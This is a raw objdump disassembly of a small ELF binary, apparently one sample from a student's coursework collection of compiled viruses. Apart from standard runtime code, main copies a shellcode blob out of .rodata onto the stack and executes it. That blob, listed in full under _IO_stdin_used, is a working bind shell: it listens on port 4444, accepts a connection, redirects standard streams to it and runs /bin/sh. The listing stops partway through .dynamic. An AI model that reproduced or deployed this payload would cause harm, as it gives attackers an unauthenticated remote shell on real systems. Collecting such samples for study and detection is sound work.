
/home/stas/Coursach/Выборки/compiled/viruses/13463:     формат файла elf32-i386


Дизассемблирование раздела .interp:

08048154 <.interp>:
 8048154:	2f                   	das    
 8048155:	6c                   	insb   (%dx),%es:(%edi)
 8048156:	69 62 2f 6c 64 2d 6c 	imul   $0x6c2d646c,0x2f(%edx),%esp
 804815d:	69 6e 75 78 2e 73 6f 	imul   $0x6f732e78,0x75(%esi),%ebp
 8048164:	2e 32 00             	xor    %cs:(%eax),%al

Дизассемблирование раздела .note.ABI-tag:

08048168 <.note.ABI-tag>:
 8048168:	04 00                	add    $0x0,%al
 804816a:	00 00                	add    %al,(%eax)
 804816c:	10 00                	adc    %al,(%eax)
 804816e:	00 00                	add    %al,(%eax)
 8048170:	01 00                	add    %eax,(%eax)
 8048172:	00 00                	add    %al,(%eax)
 8048174:	47                   	inc    %edi
 8048175:	4e                   	dec    %esi
 8048176:	55                   	push   %ebp
 8048177:	00 00                	add    %al,(%eax)
 8048179:	00 00                	add    %al,(%eax)
 804817b:	00 02                	add    %al,(%edx)
 804817d:	00 00                	add    %al,(%eax)
 804817f:	00 06                	add    %al,(%esi)
 8048181:	00 00                	add    %al,(%eax)
 8048183:	00 18                	add    %bl,(%eax)
 8048185:	00 00                	add    %al,(%eax)
	...

Дизассемблирование раздела .note.gnu.build-id:

08048188 <.note.gnu.build-id>:
 8048188:	04 00                	add    $0x0,%al
 804818a:	00 00                	add    %al,(%eax)
 804818c:	14 00                	adc    $0x0,%al
 804818e:	00 00                	add    %al,(%eax)
 8048190:	03 00                	add    (%eax),%eax
 8048192:	00 00                	add    %al,(%eax)
 8048194:	47                   	inc    %edi
 8048195:	4e                   	dec    %esi
 8048196:	55                   	push   %ebp
 8048197:	00 62 f4             	add    %ah,-0xc(%edx)
 804819a:	a1 71 57 d5 51       	mov    0x51d55771,%eax
 804819f:	c1                   	(bad)  
 80481a0:	76 73                	jbe    8048215 <_init-0xc3>
 80481a2:	e8 2a 0f c7 b7       	call   bfcb90d1 <_end+0xb7c6f0ad>
 80481a7:	18 53 50             	sbb    %dl,0x50(%ebx)
 80481aa:	8f                   	.byte 0x8f
 80481ab:	e9                   	.byte 0xe9

Дизассемблирование раздела .gnu.hash:

080481ac <.gnu.hash>:
 80481ac:	02 00                	add    (%eax),%al
 80481ae:	00 00                	add    %al,(%eax)
 80481b0:	04 00                	add    $0x0,%al
 80481b2:	00 00                	add    %al,(%eax)
 80481b4:	01 00                	add    %eax,(%eax)
 80481b6:	00 00                	add    %al,(%eax)
 80481b8:	05 00 00 00 00       	add    $0x0,%eax
 80481bd:	20 00                	and    %al,(%eax)
 80481bf:	20 00                	and    %al,(%eax)
 80481c1:	00 00                	add    %al,(%eax)
 80481c3:	00 04 00             	add    %al,(%eax,%eax,1)
 80481c6:	00 00                	add    %al,(%eax)
 80481c8:	ad                   	lods   %ds:(%esi),%eax
 80481c9:	4b                   	dec    %ebx
 80481ca:	e3 c0                	jecxz  804818c <_init-0x14c>

Дизассемблирование раздела .dynsym:

080481cc <.dynsym>:
	...
 80481dc:	1a 00                	sbb    (%eax),%al
	...
 80481e6:	00 00                	add    %al,(%eax)
 80481e8:	12 00                	adc    (%eax),%al
 80481ea:	00 00                	add    %al,(%eax)
 80481ec:	3d 00 00 00 00       	cmp    $0x0,%eax
 80481f1:	00 00                	add    %al,(%eax)
 80481f3:	00 00                	add    %al,(%eax)
 80481f5:	00 00                	add    %al,(%eax)
 80481f7:	00 20                	add    %ah,(%eax)
 80481f9:	00 00                	add    %al,(%eax)
 80481fb:	00 2b                	add    %ch,(%ebx)
	...
 8048205:	00 00                	add    %al,(%eax)
 8048207:	00 12                	add    %dl,(%edx)
 8048209:	00 00                	add    %al,(%eax)
 804820b:	00 0b                	add    %cl,(%ebx)
 804820d:	00 00                	add    %al,(%eax)
 804820f:	00 2c 85 04 08 04 00 	add    %ch,0x40804(,%eax,4)
 8048216:	00 00                	add    %al,(%eax)
 8048218:	11 00                	adc    %eax,(%eax)
 804821a:	0f                   	.byte 0xf
	...

Дизассемблирование раздела .dynstr:

0804821c <.dynstr>:
 804821c:	00 6c 69 62          	add    %ch,0x62(%ecx,%ebp,2)
 8048220:	63 2e                	arpl   %bp,(%esi)
 8048222:	73 6f                	jae    8048293 <_init-0x45>
 8048224:	2e 36 00 5f 49       	cs add %bl,%cs:%ss:0x49(%edi)
 8048229:	4f                   	dec    %edi
 804822a:	5f                   	pop    %edi
 804822b:	73 74                	jae    80482a1 <_init-0x37>
 804822d:	64 69 6e 5f 75 73 65 	imul   $0x64657375,%fs:0x5f(%esi),%ebp
 8048234:	64 
 8048235:	00 5f 5f             	add    %bl,0x5f(%edi)
 8048238:	73 74                	jae    80482ae <_init-0x2a>
 804823a:	61                   	popa   
 804823b:	63 6b 5f             	arpl   %bp,0x5f(%ebx)
 804823e:	63 68 6b             	arpl   %bp,0x6b(%eax)
 8048241:	5f                   	pop    %edi
 8048242:	66 61                	popaw  
 8048244:	69 6c 00 5f 5f 6c 69 	imul   $0x62696c5f,0x5f(%eax,%eax,1),%ebp
 804824b:	62 
 804824c:	63 5f 73             	arpl   %bx,0x73(%edi)
 804824f:	74 61                	je     80482b2 <_init-0x26>
 8048251:	72 74                	jb     80482c7 <_init-0x11>
 8048253:	5f                   	pop    %edi
 8048254:	6d                   	insl   (%dx),%es:(%edi)
 8048255:	61                   	popa   
 8048256:	69 6e 00 5f 5f 67 6d 	imul   $0x6d675f5f,0x0(%esi),%ebp
 804825d:	6f                   	outsl  %ds:(%esi),(%dx)
 804825e:	6e                   	outsb  %ds:(%esi),(%dx)
 804825f:	5f                   	pop    %edi
 8048260:	73 74                	jae    80482d6 <_init-0x2>
 8048262:	61                   	popa   
 8048263:	72 74                	jb     80482d9 <_init+0x1>
 8048265:	5f                   	pop    %edi
 8048266:	5f                   	pop    %edi
 8048267:	00 47 4c             	add    %al,0x4c(%edi)
 804826a:	49                   	dec    %ecx
 804826b:	42                   	inc    %edx
 804826c:	43                   	inc    %ebx
 804826d:	5f                   	pop    %edi
 804826e:	32 2e                	xor    (%esi),%ch
 8048270:	30 00                	xor    %al,(%eax)
 8048272:	47                   	inc    %edi
 8048273:	4c                   	dec    %esp
 8048274:	49                   	dec    %ecx
 8048275:	42                   	inc    %edx
 8048276:	43                   	inc    %ebx
 8048277:	5f                   	pop    %edi
 8048278:	32 2e                	xor    (%esi),%ch
 804827a:	34 00                	xor    $0x0,%al

Дизассемблирование раздела .gnu.version:

0804827c <.gnu.version>:
 804827c:	00 00                	add    %al,(%eax)
 804827e:	02 00                	add    (%eax),%al
 8048280:	00 00                	add    %al,(%eax)
 8048282:	03 00                	add    (%eax),%eax
 8048284:	01 00                	add    %eax,(%eax)

Дизассемблирование раздела .gnu.version_r:

08048288 <.gnu.version_r>:
 8048288:	01 00                	add    %eax,(%eax)
 804828a:	02 00                	add    (%eax),%al
 804828c:	01 00                	add    %eax,(%eax)
 804828e:	00 00                	add    %al,(%eax)
 8048290:	10 00                	adc    %al,(%eax)
 8048292:	00 00                	add    %al,(%eax)
 8048294:	00 00                	add    %al,(%eax)
 8048296:	00 00                	add    %al,(%eax)
 8048298:	10 69 69             	adc    %ch,0x69(%ecx)
 804829b:	0d 00 00 03 00       	or     $0x30000,%eax
 80482a0:	4c                   	dec    %esp
 80482a1:	00 00                	add    %al,(%eax)
 80482a3:	00 10                	add    %dl,(%eax)
 80482a5:	00 00                	add    %al,(%eax)
 80482a7:	00 14 69             	add    %dl,(%ecx,%ebp,2)
 80482aa:	69 0d 00 00 02 00 56 	imul   $0x56,0x20000,%ecx
 80482b1:	00 00 00 
 80482b4:	00 00                	add    %al,(%eax)
	...

Дизассемблирование раздела .rel.dyn:

080482b8 <.rel.dyn>:
 80482b8:	fc                   	cld    
 80482b9:	9f                   	lahf   
 80482ba:	04 08                	add    $0x8,%al
 80482bc:	06                   	push   %es
 80482bd:	02 00                	add    (%eax),%al
	...

Дизассемблирование раздела .rel.plt:

080482c0 <.rel.plt>:
 80482c0:	0c a0                	or     $0xa0,%al
 80482c2:	04 08                	add    $0x8,%al
 80482c4:	07                   	pop    %es
 80482c5:	01 00                	add    %eax,(%eax)
 80482c7:	00 10                	add    %dl,(%eax)
 80482c9:	a0 04 08 07 02       	mov    0x2070804,%al
 80482ce:	00 00                	add    %al,(%eax)
 80482d0:	14 a0                	adc    $0xa0,%al
 80482d2:	04 08                	add    $0x8,%al
 80482d4:	07                   	pop    %es
 80482d5:	03 00                	add    (%eax),%eax
	...

Дизассемблирование раздела .init:

080482d8 <_init>:
 80482d8:	53                   	push   %ebx
 80482d9:	83 ec 08             	sub    $0x8,%esp
 80482dc:	e8 8f 00 00 00       	call   8048370 <__x86.get_pc_thunk.bx>
 80482e1:	81 c3 1f 1d 00 00    	add    $0x1d1f,%ebx
 80482e7:	8b 83 fc ff ff ff    	mov    -0x4(%ebx),%eax
 80482ed:	85 c0                	test   %eax,%eax
 80482ef:	74 05                	je     80482f6 <_init+0x1e>
 80482f1:	e8 2a 00 00 00       	call   8048320 <__gmon_start__@plt>
 80482f6:	83 c4 08             	add    $0x8,%esp
 80482f9:	5b                   	pop    %ebx
 80482fa:	c3                   	ret    

Дизассемблирование раздела .plt:

08048300 <__stack_chk_fail@plt-0x10>:
 8048300:	ff 35 04 a0 04 08    	pushl  0x804a004
 8048306:	ff 25 08 a0 04 08    	jmp    *0x804a008
 804830c:	00 00                	add    %al,(%eax)
	...

08048310 <__stack_chk_fail@plt>:
 8048310:	ff 25 0c a0 04 08    	jmp    *0x804a00c
 8048316:	68 00 00 00 00       	push   $0x0
 804831b:	e9 e0 ff ff ff       	jmp    8048300 <_init+0x28>

08048320 <__gmon_start__@plt>:
 8048320:	ff 25 10 a0 04 08    	jmp    *0x804a010
 8048326:	68 08 00 00 00       	push   $0x8
 804832b:	e9 d0 ff ff ff       	jmp    8048300 <_init+0x28>

08048330 <__libc_start_main@plt>:
 8048330:	ff 25 14 a0 04 08    	jmp    *0x804a014
 8048336:	68 10 00 00 00       	push   $0x10
 804833b:	e9 c0 ff ff ff       	jmp    8048300 <_init+0x28>

Дизассемблирование раздела .text:

08048340 <_start>:
 8048340:	31 ed                	xor    %ebp,%ebp
 8048342:	5e                   	pop    %esi
 8048343:	89 e1                	mov    %esp,%ecx
 8048345:	83 e4 f0             	and    $0xfffffff0,%esp
 8048348:	50                   	push   %eax
 8048349:	54                   	push   %esp
 804834a:	52                   	push   %edx
 804834b:	68 10 85 04 08       	push   $0x8048510
 8048350:	68 a0 84 04 08       	push   $0x80484a0
 8048355:	51                   	push   %ecx
 8048356:	56                   	push   %esi
 8048357:	68 3d 84 04 08       	push   $0x804843d
 804835c:	e8 cf ff ff ff       	call   8048330 <__libc_start_main@plt>
 8048361:	f4                   	hlt    
 8048362:	66 90                	xchg   %ax,%ax
 8048364:	66 90                	xchg   %ax,%ax
 8048366:	66 90                	xchg   %ax,%ax
 8048368:	66 90                	xchg   %ax,%ax
 804836a:	66 90                	xchg   %ax,%ax
 804836c:	66 90                	xchg   %ax,%ax
 804836e:	66 90                	xchg   %ax,%ax

08048370 <__x86.get_pc_thunk.bx>:
 8048370:	8b 1c 24             	mov    (%esp),%ebx
 8048373:	c3                   	ret    
 8048374:	66 90                	xchg   %ax,%ax
 8048376:	66 90                	xchg   %ax,%ax
 8048378:	66 90                	xchg   %ax,%ax
 804837a:	66 90                	xchg   %ax,%ax
 804837c:	66 90                	xchg   %ax,%ax
 804837e:	66 90                	xchg   %ax,%ax

08048380 <deregister_tm_clones>:
 8048380:	b8 23 a0 04 08       	mov    $0x804a023,%eax
 8048385:	2d 20 a0 04 08       	sub    $0x804a020,%eax
 804838a:	83 f8 06             	cmp    $0x6,%eax
 804838d:	77 01                	ja     8048390 <deregister_tm_clones+0x10>
 804838f:	c3                   	ret    
 8048390:	b8 00 00 00 00       	mov    $0x0,%eax
 8048395:	85 c0                	test   %eax,%eax
 8048397:	74 f6                	je     804838f <deregister_tm_clones+0xf>
 8048399:	55                   	push   %ebp
 804839a:	89 e5                	mov    %esp,%ebp
 804839c:	83 ec 18             	sub    $0x18,%esp
 804839f:	c7 04 24 20 a0 04 08 	movl   $0x804a020,(%esp)
 80483a6:	ff d0                	call   *%eax
 80483a8:	c9                   	leave  
 80483a9:	c3                   	ret    
 80483aa:	8d b6 00 00 00 00    	lea    0x0(%esi),%esi

080483b0 <register_tm_clones>:
 80483b0:	b8 20 a0 04 08       	mov    $0x804a020,%eax
 80483b5:	2d 20 a0 04 08       	sub    $0x804a020,%eax
 80483ba:	c1 f8 02             	sar    $0x2,%eax
 80483bd:	89 c2                	mov    %eax,%edx
 80483bf:	c1 ea 1f             	shr    $0x1f,%edx
 80483c2:	01 d0                	add    %edx,%eax
 80483c4:	d1 f8                	sar    %eax
 80483c6:	75 01                	jne    80483c9 <register_tm_clones+0x19>
 80483c8:	c3                   	ret    
 80483c9:	ba 00 00 00 00       	mov    $0x0,%edx
 80483ce:	85 d2                	test   %edx,%edx
 80483d0:	74 f6                	je     80483c8 <register_tm_clones+0x18>
 80483d2:	55                   	push   %ebp
 80483d3:	89 e5                	mov    %esp,%ebp
 80483d5:	83 ec 18             	sub    $0x18,%esp
 80483d8:	89 44 24 04          	mov    %eax,0x4(%esp)
 80483dc:	c7 04 24 20 a0 04 08 	movl   $0x804a020,(%esp)
 80483e3:	ff d2                	call   *%edx
 80483e5:	c9                   	leave  
 80483e6:	c3                   	ret    
 80483e7:	89 f6                	mov    %esi,%esi
 80483e9:	8d bc 27 00 00 00 00 	lea    0x0(%edi,%eiz,1),%edi

080483f0 <__do_global_dtors_aux>:
 80483f0:	80 3d 20 a0 04 08 00 	cmpb   $0x0,0x804a020
 80483f7:	75 13                	jne    804840c <__do_global_dtors_aux+0x1c>
 80483f9:	55                   	push   %ebp
 80483fa:	89 e5                	mov    %esp,%ebp
 80483fc:	83 ec 08             	sub    $0x8,%esp
 80483ff:	e8 7c ff ff ff       	call   8048380 <deregister_tm_clones>
 8048404:	c6 05 20 a0 04 08 01 	movb   $0x1,0x804a020
 804840b:	c9                   	leave  
 804840c:	f3 c3                	repz ret 
 804840e:	66 90                	xchg   %ax,%ax

08048410 <frame_dummy>:
 8048410:	a1 10 9f 04 08       	mov    0x8049f10,%eax
 8048415:	85 c0                	test   %eax,%eax
 8048417:	74 1f                	je     8048438 <frame_dummy+0x28>
 8048419:	b8 00 00 00 00       	mov    $0x0,%eax
 804841e:	85 c0                	test   %eax,%eax
 8048420:	74 16                	je     8048438 <frame_dummy+0x28>
 8048422:	55                   	push   %ebp
 8048423:	89 e5                	mov    %esp,%ebp
 8048425:	83 ec 18             	sub    $0x18,%esp
 8048428:	c7 04 24 10 9f 04 08 	movl   $0x8049f10,(%esp)
 804842f:	ff d0                	call   *%eax
 8048431:	c9                   	leave  
 8048432:	e9 79 ff ff ff       	jmp    80483b0 <register_tm_clones>
 8048437:	90                   	nop
 8048438:	e9 73 ff ff ff       	jmp    80483b0 <register_tm_clones>

0804843d <main>:
 804843d:	55                   	push   %ebp
 804843e:	89 e5                	mov    %esp,%ebp
 8048440:	57                   	push   %edi
 8048441:	56                   	push   %esi
 8048442:	53                   	push   %ebx
 8048443:	83 e4 f0             	and    $0xfffffff0,%esp
 8048446:	81 ec 90 00 00 00    	sub    $0x90,%esp
 804844c:	65 a1 14 00 00 00    	mov    %gs:0x14,%eax
 8048452:	89 84 24 8c 00 00 00 	mov    %eax,0x8c(%esp)
 8048459:	31 c0                	xor    %eax,%eax
 804845b:	8d 54 24 08          	lea    0x8(%esp),%edx
 804845f:	bb 30 85 04 08       	mov    $0x8048530,%ebx
 8048464:	b8 21 00 00 00       	mov    $0x21,%eax
 8048469:	89 d7                	mov    %edx,%edi
 804846b:	89 de                	mov    %ebx,%esi
 804846d:	89 c1                	mov    %eax,%ecx
 804846f:	f3 a5                	rep movsl %ds:(%esi),%es:(%edi)
 8048471:	8d 44 24 08          	lea    0x8(%esp),%eax
 8048475:	ff d0                	call   *%eax
 8048477:	8b 94 24 8c 00 00 00 	mov    0x8c(%esp),%edx
 804847e:	65 33 15 14 00 00 00 	xor    %gs:0x14,%edx
 8048485:	74 05                	je     804848c <main+0x4f>
 8048487:	e8 84 fe ff ff       	call   8048310 <__stack_chk_fail@plt>
 804848c:	8d 65 f4             	lea    -0xc(%ebp),%esp
 804848f:	5b                   	pop    %ebx
 8048490:	5e                   	pop    %esi
 8048491:	5f                   	pop    %edi
 8048492:	5d                   	pop    %ebp
 8048493:	c3                   	ret    
 8048494:	66 90                	xchg   %ax,%ax
 8048496:	66 90                	xchg   %ax,%ax
 8048498:	66 90                	xchg   %ax,%ax
 804849a:	66 90                	xchg   %ax,%ax
 804849c:	66 90                	xchg   %ax,%ax
 804849e:	66 90                	xchg   %ax,%ax

080484a0 <__libc_csu_init>:
 80484a0:	55                   	push   %ebp
 80484a1:	57                   	push   %edi
 80484a2:	31 ff                	xor    %edi,%edi
 80484a4:	56                   	push   %esi
 80484a5:	53                   	push   %ebx
 80484a6:	e8 c5 fe ff ff       	call   8048370 <__x86.get_pc_thunk.bx>
 80484ab:	81 c3 55 1b 00 00    	add    $0x1b55,%ebx
 80484b1:	83 ec 1c             	sub    $0x1c,%esp
 80484b4:	8b 6c 24 30          	mov    0x30(%esp),%ebp
 80484b8:	8d b3 0c ff ff ff    	lea    -0xf4(%ebx),%esi
 80484be:	e8 15 fe ff ff       	call   80482d8 <_init>
 80484c3:	8d 83 08 ff ff ff    	lea    -0xf8(%ebx),%eax
 80484c9:	29 c6                	sub    %eax,%esi
 80484cb:	c1 fe 02             	sar    $0x2,%esi
 80484ce:	85 f6                	test   %esi,%esi
 80484d0:	74 27                	je     80484f9 <__libc_csu_init+0x59>
 80484d2:	8d b6 00 00 00 00    	lea    0x0(%esi),%esi
 80484d8:	8b 44 24 38          	mov    0x38(%esp),%eax
 80484dc:	89 2c 24             	mov    %ebp,(%esp)
 80484df:	89 44 24 08          	mov    %eax,0x8(%esp)
 80484e3:	8b 44 24 34          	mov    0x34(%esp),%eax
 80484e7:	89 44 24 04          	mov    %eax,0x4(%esp)
 80484eb:	ff 94 bb 08 ff ff ff 	call   *-0xf8(%ebx,%edi,4)
 80484f2:	83 c7 01             	add    $0x1,%edi
 80484f5:	39 f7                	cmp    %esi,%edi
 80484f7:	75 df                	jne    80484d8 <__libc_csu_init+0x38>
 80484f9:	83 c4 1c             	add    $0x1c,%esp
 80484fc:	5b                   	pop    %ebx
 80484fd:	5e                   	pop    %esi
 80484fe:	5f                   	pop    %edi
 80484ff:	5d                   	pop    %ebp
 8048500:	c3                   	ret    
 8048501:	eb 0d                	jmp    8048510 <__libc_csu_fini>
 8048503:	90                   	nop
 8048504:	90                   	nop
 8048505:	90                   	nop
 8048506:	90                   	nop
 8048507:	90                   	nop
 8048508:	90                   	nop
 8048509:	90                   	nop
 804850a:	90                   	nop
 804850b:	90                   	nop
 804850c:	90                   	nop
 804850d:	90                   	nop
 804850e:	90                   	nop
 804850f:	90                   	nop

08048510 <__libc_csu_fini>:
 8048510:	f3 c3                	repz ret 

Дизассемблирование раздела .fini:

08048514 <_fini>:
 8048514:	53                   	push   %ebx
 8048515:	83 ec 08             	sub    $0x8,%esp
 8048518:	e8 53 fe ff ff       	call   8048370 <__x86.get_pc_thunk.bx>
 804851d:	81 c3 e3 1a 00 00    	add    $0x1ae3,%ebx
 8048523:	83 c4 08             	add    $0x8,%esp
 8048526:	5b                   	pop    %ebx
 8048527:	c3                   	ret    

Дизассемблирование раздела .rodata:

08048528 <_fp_hw>:
 8048528:	03 00                	add    (%eax),%eax
	...

0804852c <_IO_stdin_used>:
 804852c:	01 00                	add    %eax,(%eax)
 804852e:	02 00                	add    (%eax),%al
 8048530:	31 c0                	xor    %eax,%eax
 8048532:	31 db                	xor    %ebx,%ebx
 8048534:	31 d2                	xor    %edx,%edx
 8048536:	b0 01                	mov    $0x1,%al
 8048538:	89 c6                	mov    %eax,%esi
 804853a:	fe c0                	inc    %al
 804853c:	89 c7                	mov    %eax,%edi
 804853e:	b2 06                	mov    $0x6,%dl
 8048540:	b0 29                	mov    $0x29,%al
 8048542:	0f 05                	syscall 
 8048544:	93                   	xchg   %eax,%ebx
 8048545:	48                   	dec    %eax
 8048546:	31 c0                	xor    %eax,%eax
 8048548:	50                   	push   %eax
 8048549:	68 02 01 11 5c       	push   $0x5c110102
 804854e:	88 44 24 01          	mov    %al,0x1(%esp)
 8048552:	48                   	dec    %eax
 8048553:	89 e6                	mov    %esp,%esi
 8048555:	b2 10                	mov    $0x10,%dl
 8048557:	89 df                	mov    %ebx,%edi
 8048559:	b0 31                	mov    $0x31,%al
 804855b:	0f 05                	syscall 
 804855d:	b0 05                	mov    $0x5,%al
 804855f:	89 c6                	mov    %eax,%esi
 8048561:	89 df                	mov    %ebx,%edi
 8048563:	b0 32                	mov    $0x32,%al
 8048565:	0f 05                	syscall 
 8048567:	31 d2                	xor    %edx,%edx
 8048569:	31 f6                	xor    %esi,%esi
 804856b:	89 df                	mov    %ebx,%edi
 804856d:	b0 2b                	mov    $0x2b,%al
 804856f:	0f 05                	syscall 
 8048571:	89 c7                	mov    %eax,%edi
 8048573:	48                   	dec    %eax
 8048574:	31 c0                	xor    %eax,%eax
 8048576:	89 c6                	mov    %eax,%esi
 8048578:	b0 21                	mov    $0x21,%al
 804857a:	0f 05                	syscall 
 804857c:	fe c0                	inc    %al
 804857e:	89 c6                	mov    %eax,%esi
 8048580:	b0 21                	mov    $0x21,%al
 8048582:	0f 05                	syscall 
 8048584:	fe c0                	inc    %al
 8048586:	89 c6                	mov    %eax,%esi
 8048588:	b0 21                	mov    $0x21,%al
 804858a:	0f 05                	syscall 
 804858c:	48                   	dec    %eax
 804858d:	31 d2                	xor    %edx,%edx
 804858f:	48                   	dec    %eax
 8048590:	bb ff 2f 62 69       	mov    $0x69622fff,%ebx
 8048595:	6e                   	outsb  %ds:(%esi),(%dx)
 8048596:	2f                   	das    
 8048597:	73 68                	jae    8048601 <_IO_stdin_used+0xd5>
 8048599:	48                   	dec    %eax
 804859a:	c1 eb 08             	shr    $0x8,%ebx
 804859d:	53                   	push   %ebx
 804859e:	48                   	dec    %eax
 804859f:	89 e7                	mov    %esp,%edi
 80485a1:	48                   	dec    %eax
 80485a2:	31 c0                	xor    %eax,%eax
 80485a4:	50                   	push   %eax
 80485a5:	57                   	push   %edi
 80485a6:	48                   	dec    %eax
 80485a7:	89 e6                	mov    %esp,%esi
 80485a9:	b0 3b                	mov    $0x3b,%al
 80485ab:	0f 05                	syscall 
 80485ad:	50                   	push   %eax
 80485ae:	5f                   	pop    %edi
 80485af:	b0 3c                	mov    $0x3c,%al
 80485b1:	0f 05                	syscall 
	...

Дизассемблирование раздела .eh_frame_hdr:

080485b4 <.eh_frame_hdr>:
 80485b4:	01 1b                	add    %ebx,(%ebx)
 80485b6:	03 3b                	add    (%ebx),%edi
 80485b8:	28 00                	sub    %al,(%eax)
 80485ba:	00 00                	add    %al,(%eax)
 80485bc:	04 00                	add    $0x0,%al
 80485be:	00 00                	add    %al,(%eax)
 80485c0:	4c                   	dec    %esp
 80485c1:	fd                   	std    
 80485c2:	ff                   	(bad)  
 80485c3:	ff 44 00 00          	incl   0x0(%eax,%eax,1)
 80485c7:	00 89 fe ff ff 68    	add    %cl,0x68fffffe(%ecx)
 80485cd:	00 00                	add    %al,(%eax)
 80485cf:	00 ec                	add    %ch,%ah
 80485d1:	fe                   	(bad)  
 80485d2:	ff                   	(bad)  
 80485d3:	ff 94 00 00 00 5c ff 	call   *-0xa40000(%eax,%eax,1)
 80485da:	ff                   	(bad)  
 80485db:	ff d0                	call   *%eax
 80485dd:	00 00                	add    %al,(%eax)
	...

Дизассемблирование раздела .eh_frame:

080485e0 <__FRAME_END__-0xb8>:
 80485e0:	14 00                	adc    $0x0,%al
 80485e2:	00 00                	add    %al,(%eax)
 80485e4:	00 00                	add    %al,(%eax)
 80485e6:	00 00                	add    %al,(%eax)
 80485e8:	01 7a 52             	add    %edi,0x52(%edx)
 80485eb:	00 01                	add    %al,(%ecx)
 80485ed:	7c 08                	jl     80485f7 <_IO_stdin_used+0xcb>
 80485ef:	01 1b                	add    %ebx,(%ebx)
 80485f1:	0c 04                	or     $0x4,%al
 80485f3:	04 88                	add    $0x88,%al
 80485f5:	01 00                	add    %eax,(%eax)
 80485f7:	00 20                	add    %ah,(%eax)
 80485f9:	00 00                	add    %al,(%eax)
 80485fb:	00 1c 00             	add    %bl,(%eax,%eax,1)
 80485fe:	00 00                	add    %al,(%eax)
 8048600:	00 fd                	add    %bh,%ch
 8048602:	ff                   	(bad)  
 8048603:	ff 40 00             	incl   0x0(%eax)
 8048606:	00 00                	add    %al,(%eax)
 8048608:	00 0e                	add    %cl,(%esi)
 804860a:	08 46 0e             	or     %al,0xe(%esi)
 804860d:	0c 4a                	or     $0x4a,%al
 804860f:	0f 0b                	ud2    
 8048611:	74 04                	je     8048617 <_IO_stdin_used+0xeb>
 8048613:	78 00                	js     8048615 <_IO_stdin_used+0xe9>
 8048615:	3f                   	aas    
 8048616:	1a 3b                	sbb    (%ebx),%bh
 8048618:	2a 32                	sub    (%edx),%dh
 804861a:	24 22                	and    $0x22,%al
 804861c:	28 00                	sub    %al,(%eax)
 804861e:	00 00                	add    %al,(%eax)
 8048620:	40                   	inc    %eax
 8048621:	00 00                	add    %al,(%eax)
 8048623:	00 19                	add    %bl,(%ecx)
 8048625:	fe                   	(bad)  
 8048626:	ff                   	(bad)  
 8048627:	ff 57 00             	call   *0x0(%edi)
 804862a:	00 00                	add    %al,(%eax)
 804862c:	00 41 0e             	add    %al,0xe(%ecx)
 804862f:	08 85 02 42 0d 05    	or     %al,0x50d4202(%ebp)
 8048635:	4c                   	dec    %esp
 8048636:	87 03                	xchg   %eax,(%ebx)
 8048638:	86 04 83             	xchg   %al,(%ebx,%eax,4)
 804863b:	05 02 44 c3 41       	add    $0x41c34402,%eax
 8048640:	c6 41 c7 41          	movb   $0x41,-0x39(%ecx)
 8048644:	c5 0c 04             	lds    (%esp,%eax,1),%ecx
 8048647:	04 38                	add    $0x38,%al
 8048649:	00 00                	add    %al,(%eax)
 804864b:	00 6c 00 00          	add    %ch,0x0(%eax,%eax,1)
 804864f:	00 50 fe             	add    %dl,-0x2(%eax)
 8048652:	ff                   	(bad)  
 8048653:	ff 61 00             	jmp    *0x0(%ecx)
 8048656:	00 00                	add    %al,(%eax)
 8048658:	00 41 0e             	add    %al,0xe(%ecx)
 804865b:	08 85 02 41 0e 0c    	or     %al,0xc0e4102(%ebp)
 8048661:	87 03                	xchg   %eax,(%ebx)
 8048663:	43                   	inc    %ebx
 8048664:	0e                   	push   %cs
 8048665:	10 86 04 41 0e 14    	adc    %al,0x140e4104(%esi)
 804866b:	83 05 4e 0e 30 02 48 	addl   $0x48,0x2300e4e
 8048672:	0e                   	push   %cs
 8048673:	14 41                	adc    $0x41,%al
 8048675:	c3                   	ret    
 8048676:	0e                   	push   %cs
 8048677:	10 41 c6             	adc    %al,-0x3a(%ecx)
 804867a:	0e                   	push   %cs
 804867b:	0c 41                	or     $0x41,%al
 804867d:	c7                   	(bad)  
 804867e:	0e                   	push   %cs
 804867f:	08 41 c5             	or     %al,-0x3b(%ecx)
 8048682:	0e                   	push   %cs
 8048683:	04 10                	add    $0x10,%al
 8048685:	00 00                	add    %al,(%eax)
 8048687:	00 a8 00 00 00 84    	add    %ch,-0x7c000000(%eax)
 804868d:	fe                   	(bad)  
 804868e:	ff                   	(bad)  
 804868f:	ff 02                	incl   (%edx)
 8048691:	00 00                	add    %al,(%eax)
 8048693:	00 00                	add    %al,(%eax)
 8048695:	00 00                	add    %al,(%eax)
	...

08048698 <__FRAME_END__>:
 8048698:	00 00                	add    %al,(%eax)
	...

Дизассемблирование раздела .init_array:

08049f08 <__frame_dummy_init_array_entry>:
 8049f08:	10                   	.byte 0x10
 8049f09:	84 04 08             	test   %al,(%eax,%ecx,1)

Дизассемблирование раздела .fini_array:

08049f0c <__do_global_dtors_aux_fini_array_entry>:
 8049f0c:	f0                   	lock
 8049f0d:	83                   	.byte 0x83
 8049f0e:	04 08                	add    $0x8,%al

Дизассемблирование раздела .jcr:

08049f10 <__JCR_END__>:
 8049f10:	00 00                	add    %al,(%eax)
	...

Дизассемблирование раздела .dynamic:

08049f14 <_DYNAMIC>:
 8049f14:	01 00                	add    %eax,(%eax)
 8049f16:	00 00                	add    %al,(%eax)
 8049f18:	01 00                	add    %eax,(%eax)
 8049f1a:	00 00                	add    %al,(%eax)
 8049f1c:	0c 00                	or     $0x0,%al
 8049f1e:	00 00                	add    %al,(%eax)
 8049f20:	d8 82 04 08 0d 00    	fadds  0xd0804(%edx)
 8049f26:	00 00                	add    %al,(%eax)
 8049f28:	14 85                	adc    $0x85,%al
 8049f2a:	04 08                	add    $0x8,%al
 8049f2c:	19 00                	sbb    %eax,(%eax)
 8049f2e:	00 00                	add    %al,(%eax)
 8049f30:	08 9f 04 08 1b 00    	or     %bl,0x1b0804(%edi)
 8049f36:	00 00                	add    %al,(%eax)
 8049f38:	04 00                	add    $0x0,%al
 8049f3a:	00 00                	add    %al,(%eax)
 8049f3c:	1a 00                	sbb    (%eax),%al
 8049f3e:	00 00                	add    %al,(%eax)
 8049f40:	0c 9f                	or     $0x9f,%al
 8049f42:	04 08                	add    $0x8,%al
 8049f44:	1c 00                	sbb    $0x0,%al
 8049f46:	00 00                	add    %al,(%eax)
 8049f48:	04 00                	add    $0x0,%al
 8049f4a:	00 00                	add    %al,(%eax)
 8049f4c:	f5                   	cmc    
 8049f4d:	fe                   	(bad)  
 8049f4e:	ff 6f ac             	ljmp   *-0x54(%edi)
